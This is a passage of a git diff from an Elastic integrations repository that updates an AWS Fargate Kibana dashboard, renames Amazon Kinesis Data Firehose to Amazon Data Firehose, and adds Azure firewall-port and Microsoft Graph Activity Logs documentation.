"ordinal", - "sourceField": "awsfargate.task_stats.identifier" - }, - "989ce63a-7fcd-4c83-980b-d595a1dd2469": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "DiskIO Read", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "awsfargate.task_stats.diskio.read.bytes" - } - } - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b" - ], - "layerId": "c8d70f88-6554-41ca-ac1e-a3cf8b992972", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "0505d890-632e-4434-a68f-f019e7893eaf", - "xAccessor": "989ce63a-7fcd-4c83-980b-d595a1dd2469" - } + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-0749cbce-4a88-471d-9715-9f4f54510864", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "0749cbce-4a88-471d-9715-9f4f54510864": { + "columnOrder": [ + "35481ca7-cebb-495c-974f-34ede5f3935c", + "33d4857c-800a-4854-9369-dbf019501bdd", + "ec425562-fe79-4326-b753-20b408c806fb" ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true + "columns": { + "33d4857c-800a-4854-9369-dbf019501bdd": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Container Identifier", + "operationType": "terms", + "params": { + "orderBy": { + "columnId": "ec425562-fe79-4326-b753-20b408c806fb", + "type": "column" + }, + "orderDirection": "desc", + "parentFormat": { + "id": "terms" + }, + "size": 20 + }, + "scale": "ordinal", + "sourceField": "awsfargate.task_stats.identifier" + }, + "35481ca7-cebb-495c-974f-34ede5f3935c": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "10s" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "ec425562-fe79-4326-b753-20b408c806fb": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Container CPU Total Norm Pct", + "operationType": "average", + "params": { + "format": { + "id": "percent", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "awsfargate.task_stats.cpu.total.norm.pct" + } } + } } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" }, - "title": "DiskIO Read [Metrics AWSFargate]", - "type": "lens", - "visualizationType": "lnsXY" + "visualization": { + "fittingFunction": "None", + "layers": [ + { + "accessors": [ + "ec425562-fe79-4326-b753-20b408c806fb" + ], + "layerId": "0749cbce-4a88-471d-9715-9f4f54510864", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "33d4857c-800a-4854-9369-dbf019501bdd", + "xAccessor": "35481ca7-cebb-495c-974f-34ede5f3935c" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "line" + } + }, + "title": "Container CPU Total Norm Pct [Metrics AWSFargate]", + "visualizationType": "lnsXY" }, "enhancements": {}, "hidePanelTitles": false + }, + "title": "Container CPU Total Norm Pct" }, - "gridData": { + { + "type": "lens", + "gridData": { "h": 15, - "i": "d7a6623a-14cf-411c-ab73-ded3734a359b", + "i": "9131626b-0386-4f36-838d-0c5615e74279", "w": 24, "x": 0, "y": 44 - }, - "panelIndex": "d7a6623a-14cf-411c-ab73-ded3734a359b", - "title": "DiskIO Read", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { + }, + "panelIndex": "9131626b-0386-4f36-838d-0c5615e74279", + "embeddableConfig": { "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-c8d70f88-6554-41ca-ac1e-a3cf8b992972", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "c8d70f88-6554-41ca-ac1e-a3cf8b992972": { - "columnOrder": [ - "0505d890-632e-4434-a68f-f019e7893eaf", - "989ce63a-7fcd-4c83-980b-d595a1dd2469", - "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b" - ], - "columns": { - "0505d890-632e-4434-a68f-f019e7893eaf": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of awsfargate.task_stats.identifier", - "operationType": "terms", - "params": { - "orderBy": { - "columnId": "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b", - "type": "column" - }, - "orderDirection": "desc", - "parentFormat": { - "id": "terms" - }, - "size": 20 - }, - "scale": "ordinal", - "sourceField": "awsfargate.task_stats.identifier" - }, - "989ce63a-7fcd-4c83-980b-d595a1dd2469": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "DiskIO Write", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "awsfargate.task_stats.diskio.write.bytes" - } - } - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b" - ], - "layerId": "c8d70f88-6554-41ca-ac1e-a3cf8b992972", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "0505d890-632e-4434-a68f-f019e7893eaf", - "xAccessor": "989ce63a-7fcd-4c83-980b-d595a1dd2469" - } + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-c8d70f88-6554-41ca-ac1e-a3cf8b992972", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "c8d70f88-6554-41ca-ac1e-a3cf8b992972": { + "columnOrder": [ + "0505d890-632e-4434-a68f-f019e7893eaf", + "989ce63a-7fcd-4c83-980b-d595a1dd2469", + "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b" ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true + "columns": { + "0505d890-632e-4434-a68f-f019e7893eaf": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of awsfargate.task_stats.identifier", + "operationType": "terms", + "params": { + "orderBy": { + "columnId": "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b", + "type": "column" + }, + "orderDirection": "desc", + "parentFormat": { + "id": "terms" + }, + "size": 20 + }, + "scale": "ordinal", + "sourceField": "awsfargate.task_stats.identifier" + }, + "989ce63a-7fcd-4c83-980b-d595a1dd2469": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "DiskIO Read", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "awsfargate.task_stats.diskio.read.bytes" + } } + } } + } }, - "title": "DiskIO Write [Metrics AWSFargate]", - "type": "lens", - "visualizationType": "lnsXY" + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b" + ], + "layerId": "c8d70f88-6554-41ca-ac1e-a3cf8b992972", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "0505d890-632e-4434-a68f-f019e7893eaf", + "xAccessor": "989ce63a-7fcd-4c83-980b-d595a1dd2469" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + } + } + }, + "title": "DiskIO Read [Metrics AWSFargate]", + "type": "lens", + "visualizationType": "lnsXY" }, "enhancements": {}, "hidePanelTitles": false + }, + "title": "DiskIO Read" }, - "gridData": { + { + "type": "lens", + "gridData": { "h": 15, - "i": "89b0cd8b-13d9-4a43-8f93-3410aff125c3", + "i": "d10ca3b7-2b7c-44e3-9ea6-aba407a6a68f", "w": 24, "x": 24, "y": 44 - }, - "panelIndex": "89b0cd8b-13d9-4a43-8f93-3410aff125c3", - "title": "DiskIO Write", - "type": "lens", - "version": "8.3.0" - } + }, + "panelIndex": "d10ca3b7-2b7c-44e3-9ea6-aba407a6a68f", + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-c8d70f88-6554-41ca-ac1e-a3cf8b992972", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "c8d70f88-6554-41ca-ac1e-a3cf8b992972": { + "columnOrder": [ + "0505d890-632e-4434-a68f-f019e7893eaf", + "989ce63a-7fcd-4c83-980b-d595a1dd2469", + "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b" + ], + "columns": { + "0505d890-632e-4434-a68f-f019e7893eaf": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of awsfargate.task_stats.identifier", + "operationType": "terms", + "params": { + "orderBy": { + "columnId": "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b", + "type": "column" + }, + "orderDirection": "desc", + "parentFormat": { + "id": "terms" + }, + "size": 20 + }, + "scale": "ordinal", + "sourceField": "awsfargate.task_stats.identifier" + }, + "989ce63a-7fcd-4c83-980b-d595a1dd2469": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "DiskIO Write", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "awsfargate.task_stats.diskio.write.bytes" + } + } + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b" + ], + "layerId": "c8d70f88-6554-41ca-ac1e-a3cf8b992972", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "0505d890-632e-4434-a68f-f019e7893eaf", + "xAccessor": "989ce63a-7fcd-4c83-980b-d595a1dd2469" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + } + } + }, + "title": "DiskIO Write [Metrics AWSFargate]", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "title": "DiskIO Write" + } ], "timeRestore": false, "title": "[AWS Fargate] Fargate Overview", "version": 1 }, - "coreMigrationVersion": "8.3.0", + "coreMigrationVersion": "8.8.0", + "created_at": "2023-10-19T15:29:21.489Z", "id": "awsfargate-20dc7c50-2e89-11eb-991c-c5fd3b7f5a63", - "migrationVersion": { - "dashboard": "8.3.0" - }, + "managed": false, "references": [ { "id": "metrics-*", - "name": "735a25cb-f781-4a8b-99e6-2adf582f8a37:indexpattern-datasource-current-indexpattern", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern" }, { "id": "metrics-*", - "name": "735a25cb-f781-4a8b-99e6-2adf582f8a37:indexpattern-datasource-layer-e350c9e6-e6b7-40f1-83ed-94a38ed9467a", + "name": "dce84c11-4c70-448f-86c4-820b164072b6:indexpattern-datasource-layer-e350c9e6-e6b7-40f1-83ed-94a38ed9467a", "type": "index-pattern" }, { "id": "metrics-*", - "name": "5d4537e8-9aee-47e6-8580-1961d8a3a38e:indexpattern-datasource-current-indexpattern", + "name": "e609f80a-d1b2-4820-a896-a8a68a731ed0:indexpattern-datasource-layer-450490b7-c7f9-42bf-8e7d-227cbf960e94", "type": "index-pattern" }, { "id": "metrics-*", - "name": "5d4537e8-9aee-47e6-8580-1961d8a3a38e:indexpattern-datasource-layer-450490b7-c7f9-42bf-8e7d-227cbf960e94", + "name": "3607122f-df09-4aa9-b42c-8f58d334e7c8:indexpattern-datasource-current-indexpattern", "type": "index-pattern" }, { "id": "metrics-*", - "name": "d3c9208e-c699-4514-a091-a731d28ab9af:indexpattern-datasource-current-indexpattern", + "name": "3607122f-df09-4aa9-b42c-8f58d334e7c8:indexpattern-datasource-layer-82f43ff6-6ac1-4f73-b532-61b6b9fe15b0", "type": "index-pattern" }, { "id": "metrics-*", - "name": "d3c9208e-c699-4514-a091-a731d28ab9af:indexpattern-datasource-layer-82f43ff6-6ac1-4f73-b532-61b6b9fe15b0", + "name": "18d073d9-fbd7-42fd-b157-4721e4c810d7:indexpattern-datasource-layer-e350c9e6-e6b7-40f1-83ed-94a38ed9467a", "type": "index-pattern" }, { "id": "metrics-*", - "name": "9dd2b002-5170-49ea-afc2-30b0b46b0fd7:indexpattern-datasource-current-indexpattern", + "name": "a435ccba-ec8b-4a5f-a74b-13eb9cc4e612:indexpattern-datasource-current-indexpattern", "type": "index-pattern" }, { "id": "metrics-*", - "name": "9dd2b002-5170-49ea-afc2-30b0b46b0fd7:indexpattern-datasource-layer-e350c9e6-e6b7-40f1-83ed-94a38ed9467a", + "name": "a435ccba-ec8b-4a5f-a74b-13eb9cc4e612:indexpattern-datasource-layer-0749cbce-4a88-471d-9715-9f4f54510864", "type": "index-pattern" }, { "id": "metrics-*", - "name": "a7a6e425-98fd-4210-b3d5-005268be6274:indexpattern-datasource-current-indexpattern", + "name": "9131626b-0386-4f36-838d-0c5615e74279:indexpattern-datasource-layer-c8d70f88-6554-41ca-ac1e-a3cf8b992972", "type": "index-pattern" }, { "id": "metrics-*", - "name": "a7a6e425-98fd-4210-b3d5-005268be6274:indexpattern-datasource-layer-0749cbce-4a88-471d-9715-9f4f54510864", + "name": "d10ca3b7-2b7c-44e3-9ea6-aba407a6a68f:indexpattern-datasource-layer-c8d70f88-6554-41ca-ac1e-a3cf8b992972", "type": "index-pattern" }, { "id": "metrics-*", - "name": "d7a6623a-14cf-411c-ab73-ded3734a359b:indexpattern-datasource-layer-c8d70f88-6554-41ca-ac1e-a3cf8b992972", + "name": "controlGroup_17bd1c1a-3360-43ae-90d7-f4ad286bbbce:optionsListDataView", "type": "index-pattern" }, { "id": "metrics-*", - "name": "89b0cd8b-13d9-4a43-8f93-3410aff125c3:indexpattern-datasource-layer-c8d70f88-6554-41ca-ac1e-a3cf8b992972", + "name": "controlGroup_97e445ae-63fe-4841-a7f9-cac0071c336b:optionsListDataView", "type": "index-pattern" }, { "id": "metrics-*", - "name": "controlGroup_ee100059-0e56-4e9b-ae09-ff53234bdf8c:optionsListDataView", + "name": "controlGroup_12d08143-512a-4a8a-ae17-101d4786f7c1:optionsListDataView", "type": "index-pattern" }, { "id": "metrics-*", - "name": "controlGroup_e967cd1f-7491-4e72-8d63-23fcef40b9cc:optionsListDataView", + "name": "controlGroup_5bf10aa8-18dc-488b-a012-d7391b591685:optionsListDataView", "type": "index-pattern" }, { "id": "metrics-*", - "name": "controlGroup_b2adcf17-72de-46e8-87b1-94c16c399bf0:optionsListDataView", + "name": "controlGroup_257ac79f-80db-4f65-b10a-b680c7f217e1:optionsListDataView", "type": "index-pattern" } ], - "type": "dashboard" + "type": "dashboard", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/awsfargate/manifest.yml b/packages/awsfargate/manifest.yml index 4bea0dd8dd8..d2741e06c87 100644 --- a/packages/awsfargate/manifest.yml +++ b/packages/awsfargate/manifest.yml @@ -1,7 +1,7 @@ format_version: "3.0.0" name: awsfargate title: AWS Fargate -version: "0.4.0" +version: 1.0.0 description: Collects metrics from containers and tasks running on Amazon ECS clusters with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - aws conditions: kibana: - version: "^8.8.0" + version: "^8.12.0" elastic: subscription: basic owner: @@ -18,7 +18,7 @@ owner: screenshots: - src: /img/awsfargate-integration-overview.png title: awsfargate integration overview - size: 5108x2522 + size: 2171x2749 type: image/png icons: - src: /img/logo_fargate.svg diff --git a/packages/awsfirehose/_dev/build/docs/README.md b/packages/awsfirehose/_dev/build/docs/README.md index ac88e3abe11..72af9cdfba1 100644 --- a/packages/awsfirehose/_dev/build/docs/README.md +++ b/packages/awsfirehose/_dev/build/docs/README.md @@ -1,5 +1,5 @@ -# Amazon Kinesis Data Firehose -Amazon Kinesis Data Firehose integration offers users a way to stream logs from Firehose to Elastic Cloud. +# Amazon Data Firehose +Amazon Data Firehose integration offers users a way to stream logs from Firehose to Elastic Cloud. This integration includes predefined rules that automatically route AWS service logs to the respective integrations, which include field mappings, ingest pipelines, predefined dashboards and ect. Here is a list of log types that are supported by this integration: @@ -34,12 +34,12 @@ This is a current limitation in Firehose, which we are working with AWS to resol ![Install AWS assets](../img/install-assets.png) -2. Create a delivery stream in Amazon Kinesis Data Firehose +2. Create a delivery stream in Amazon Data Firehose - Sign into the AWS console and navigate to Amazon Kinesis. Click **Create delivery stream**. + Sign into the AWS console and navigate to Amazon Data Firehose. Click **Create Firehose stream**. Configure the delivery stream using the following settings: - ![Amazon Kinesis Data Firehose](../img/aws-firehose.png) + ![Amazon Data Firehose](../img/aws-firehose.png) **Choose source and destination** diff --git a/packages/awsfirehose/changelog.yml b/packages/awsfirehose/changelog.yml index bbb3cea8a24..4c93b452938 100644 --- a/packages/awsfirehose/changelog.yml +++ b/packages/awsfirehose/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: 0.6.0 + changes: + - description: Rename Amazon Kinesis Data Firehose to Amazon Data Firehose + type: enhancement + link: https://github.com/elastic/integrations/pull/9462 - version: 0.5.0 changes: - description: Update the package format_version to 3.0.0. diff --git a/packages/awsfirehose/data_stream/logs/elasticsearch/ingest_pipeline/default.yml b/packages/awsfirehose/data_stream/logs/elasticsearch/ingest_pipeline/default.yml index bd196c5bb35..cbcb28989ba 100644 --- a/packages/awsfirehose/data_stream/logs/elasticsearch/ingest_pipeline/default.yml +++ b/packages/awsfirehose/data_stream/logs/elasticsearch/ingest_pipeline/default.yml @@ -1,5 +1,5 @@ --- -description: Pipeline for rerouting logs streams from Amazon Kinesis Data Firehose. +description: Pipeline for rerouting logs streams from Amazon Data Firehose. processors: - set: field: ecs.version diff --git a/packages/awsfirehose/data_stream/logs/manifest.yml b/packages/awsfirehose/data_stream/logs/manifest.yml index 5d9e518c57f..d010a4d66c0 100644 --- a/packages/awsfirehose/data_stream/logs/manifest.yml +++ b/packages/awsfirehose/data_stream/logs/manifest.yml @@ -1,4 +1,4 @@ -title: Logs from Amazon Kinesis Data Firehose +title: Logs from Amazon Data Firehose type: logs dataset: awsfirehose # This integration includes predefined rules that automatically route AWS service logs to the respective integrations. diff --git a/packages/awsfirehose/docs/README.md b/packages/awsfirehose/docs/README.md index ac88e3abe11..72af9cdfba1 100644 --- a/packages/awsfirehose/docs/README.md +++ b/packages/awsfirehose/docs/README.md @@ -1,5 +1,5 @@ -# Amazon Kinesis Data Firehose -Amazon Kinesis Data Firehose integration offers users a way to stream logs from Firehose to Elastic Cloud. +# Amazon Data Firehose +Amazon Data Firehose integration offers users a way to stream logs from Firehose to Elastic Cloud. This integration includes predefined rules that automatically route AWS service logs to the respective integrations, which include field mappings, ingest pipelines, predefined dashboards and ect. Here is a list of log types that are supported by this integration: @@ -34,12 +34,12 @@ This is a current limitation in Firehose, which we are working with AWS to resol ![Install AWS assets](../img/install-assets.png) -2. Create a delivery stream in Amazon Kinesis Data Firehose +2. Create a delivery stream in Amazon Data Firehose - Sign into the AWS console and navigate to Amazon Kinesis. Click **Create delivery stream**. + Sign into the AWS console and navigate to Amazon Data Firehose. Click **Create Firehose stream**. Configure the delivery stream using the following settings: - ![Amazon Kinesis Data Firehose](../img/aws-firehose.png) + ![Amazon Data Firehose](../img/aws-firehose.png) **Choose source and destination** diff --git a/packages/awsfirehose/img/aws-firehose.png b/packages/awsfirehose/img/aws-firehose.png index b3fb863df1f..66171a6c6db 100644 Binary files a/packages/awsfirehose/img/aws-firehose.png and b/packages/awsfirehose/img/aws-firehose.png differ diff --git a/packages/awsfirehose/manifest.yml b/packages/awsfirehose/manifest.yml index c7d1068f794..864a79d427d 100644 --- a/packages/awsfirehose/manifest.yml +++ b/packages/awsfirehose/manifest.yml @@ -1,8 +1,8 @@ format_version: "3.0.0" name: awsfirehose -title: Amazon Kinesis Data Firehose -version: 0.5.0 -description: Stream logs from Amazon Kinesis Data Firehose into Elastic Cloud. +title: Amazon Data Firehose +version: 0.6.0 +description: Stream logs from Amazon Data Firehose into Elastic Cloud. type: integration categories: - observability diff --git a/packages/azure/_dev/build/docs/README.md b/packages/azure/_dev/build/docs/README.md index 74a25217402..3c5d32d8c17 100644 --- a/packages/azure/_dev/build/docs/README.md +++ b/packages/azure/_dev/build/docs/README.md @@ -1,6 +1,6 @@ # Azure Logs Integration -The Azure Logs integration collects logs for specific Azure services like Azure Active Directory (Sign-in, Audit, Identity Protection, and Provisioning logs), Azure Spring Apps, Azure Firewall, and several others using the Activity and Platform logs. +The Azure Logs integration collects logs for specific Azure services like Azure Active Directory (Sign-in, Audit, Identity Protection, and Provisioning logs), Azure Spring Apps, Azure Firewall, Microsoft Graph Activity, and several others using the Activity and Platform logs. You can then visualize that data in Kibana, create alerts to notify you if something goes wrong, and reference data when troubleshooting an issue. @@ -16,7 +16,7 @@ fail to start due to an exceed quota limit. The Azure Logs integration collects logs. **Logs** help you keep a record of events that happen on your Azure account. -Log data streams collected by the Azure Logs integration include Activity, Platform, Active Directory (Sign-in, Audit, Identity Protection, Provisioning), and Spring Apps logs. +Log data streams collected by the Azure Logs integration include Activity, Platform, Active Directory (Sign-in, Audit, Identity Protection, Provisioning), Microsoft Graph Activity, and Spring Apps logs. ## Requirements @@ -266,6 +266,59 @@ The Elastic Agent can use one Storage account container for all integrations. The Agent will use the integration name and the event hub name to identify the blob to store the consumer group information uniquely. +### Running the integration behind a firewall + +When you run the Elastic Agent behind a firewall, to ensure proper communication with the necessary components, you need to allow traffic on port `5671` and `5672` for the Event Hub, and port `443` for the Storage Account container. + +```text +┌────────────────────────────────┐ ┌───────────────────┐ ┌───────────────────┐ +│ │ │ │ │ │ +│ ┌────────────┐ ┌───────────┐ │ │ ┌──────────────┐ │ │ ┌───────────────┐ │ +│ │ diagnostic │ │ event hub │ │ │ │azure-eventhub│ │ │ │ activity logs │ │ +│ │ setting │──▶│ │◀┼AMQP─│ <> │─┼──┼▶│<>│ │ +│ └────────────┘ └───────────┘ │ │ └──────────────┘ │ │ └───────────────┘ │ +│ │ │ │ │ │ │ +│ │ │ │ │ │ │ +│ │ │ │ │ │ │ +│ ┌─────────────┬─────HTTPS─┼──────────┘ │ │ │ +│ ┌───────┼─────────────┼──────┐ │ │ │ │ │ +│ │ │ │ │ │ │ │ │ │ +│ │ ▼ ▼ │ │ └─Agent─────────────┘ └─Elastic Cloud─────┘ +│ │ ┌──────────┐ ┌──────────┐ │ │ +│ │ │ 0 │ │ 1 │ │ │ +│ │ │ <> │ │ <> │ │ │ +│ │ └──────────┘ └──────────┘ │ │ +│ │ │ │ +│ │ │ │ +│ └─Storage Account Container──┘ │ +│ │ +│ │ +└─Azure──────────────────────────┘ +``` + +#### Event Hub + +Port `5671` and `5672` are commonly used for secure communication with the Event Hub. These ports are used to receive events. By allowing traffic on these ports, the Elastic Agent can establish a secure connection with the Event Hub. + +For more information, check the following documents: + +- [What ports do I need to open on the firewall?](https://learn.microsoft.com/en-us/azure/event-hubs/event-hubs-faq#what-ports-do-i-need-to-open-on-the-firewall) from the [Event Hubs frequently asked questions](https://learn.microsoft.com/en-us/azure/event-hubs/event-hubs-faq#what-ports-do-i-need-to-open-on-the-firewall). +- [AMQP outbound port requirements](https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-amqp-protocol-guide#amqp-outbound-port-requirements) + +#### Storage Account Container + +Port `443` is used for secure communication with the Storage Account container. This port is commonly used for HTTPS traffic. By allowing traffic on port 443, the Elastic Agent can securely access and interact with the Storage Account container, which is essential for storing and retrieving checkpoint data for each event hub partition. + +#### DNS + +Optionally, you can restrict the traffic to the following domain names: + +```text +*.servicebus.windows.net +*.blob.core.windows.net +*.cloudapp.net +``` + ## Settings Use the following settings to configure the Azure Logs integration when you add it to Fleet. diff --git a/packages/azure/_dev/build/docs/graphactivitylogs.md b/packages/azure/_dev/build/docs/graphactivitylogs.md new file mode 100644 index 00000000000..7a93a6faef9 --- /dev/null +++ b/packages/azure/_dev/build/docs/graphactivitylogs.md @@ -0,0 +1,84 @@ +# Microsoft Graph Activity Logs + +Microsoft Graph Activity Logs provide an audit trail of all HTTP requests that the Microsoft Graph service has received and processed for a tenant. Microsoft Graph Activity Logs gives full visibility into all transactions made by applications and other API clients that you have consented to in the tenant. Refer to [Microsoft Graph Activity Common Usecases](https://learn.microsoft.com/en-us/graph/microsoft-graph-activity-logs-overview#common-use-cases-for-microsoft-graph-activity-logs) for more use cases. + +Tenant administrators can configure the collection and storage destinations of Microsoft Graph Activity Logs through Diagnostic Setting in the Entra Portal. This integration uses Azure Event Hubs destination to stream Microsoft Graph Activity Logs to Elastic. + +## Requirements and Setup + +### Prerequisites + +Following privileges are required to collect Microsoft Graph Activity Logs: +- A Microsoft Entra ID P1 or P2 tenant license in your tenant. +- A `Security Administrator` or `Global Administrator` Microsoft Entra ID role to configure the diagnostic settings. +Refer to [Microsoft Graph Prerequisites](https://learn.microsoft.com/en-us/graph/microsoft-graph-activity-logs-overview#prerequisites) for more information on required privileges. + +### Setup + +Refer to the [Azure Logs](https://docs.elastic.co/integrations/azure) page for more information about setting up and using this integration. + +### Limitations + +- Activities of multi-tenant applications belonging to another tenant are not available. +- In few rare cases, events might take up to 2 hours to be delivered to Event Hubs. +Refer to [Microsoft Graph Activity Limitations](https://learn.microsoft.com/en-us/graph/microsoft-graph-activity-logs-overview#limitations) for more information. + +## Settings + +`eventhub` : + _string_ +It is a fully managed, real-time data ingestion service. Elastic recommends using only letters, numbers, and the hyphen (-) character for Event Hub names to maximize compatibility. You _can_ use existing Event Hubs having underscores (_) in the Event Hub name; in this case, the integration will replace underscores with hyphens (-) when it uses the Event Hub name to create dependent Azure resources behind the scenes (e.g., the storage account container to store Event Hub consumer offsets). Elastic also recommends using a separate event hub for each log type as the field mappings of each log type differ. +Default value `insights-operational-logs`. + +`consumer_group` : +_string_ + The publish/subscribe mechanism of Event Hubs is enabled through consumer groups. A consumer group is a view (state, position, or offset) of an entire event hub. Consumer groups enable multiple consuming applications to each have a separate view of the event stream, and to read the stream independently at their own pace and with their own offsets. +Default value: `$Default` + +`connection_string` : +_string_ +The connection string required to communicate with Event Hubs, steps [here](https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-get-connection-string). + +A Blob Storage account is required in order to store/retrieve/update the offset or state of the eventhub messages. This means that after stopping the filebeat azure module it can start back up at the spot that it stopped processing messages. + +`storage_account` : +_string_ +The name of the storage account the state/offsets will be stored and updated. + +`storage_account_key` : +_string_ +The storage account key, this key will be used to authorize access to data in your storage account. + +`storage_account_container` : +_string_ +The storage account container where the integration stores the checkpoint data for the consumer group. It is an advanced option to use with extreme care. You MUST use a dedicated storage account container for each Azure log type (activity, sign-in, audit logs, and others). DO NOT REUSE the same container name for more than one Azure log type. See [Container Names](https://docs.microsoft.com/en-us/rest/api/storageservices/naming-and-referencing-containers--blobs--and-metadata#container-names) for details on naming rules from Microsoft. The integration generates a default container name if not specified. + +`resource_manager_endpoint` : +_string_ +Optional, by default we are using the azure public environment, to override, users can provide a specific resource manager endpoint in order to use a different Azure environment. + +Resource manager endpoints: + +```text +# Azure ChinaCloud +https://management.chinacloudapi.cn/ + +# Azure GermanCloud +https://management.microsoftazure.de/ + +# Azure PublicCloud 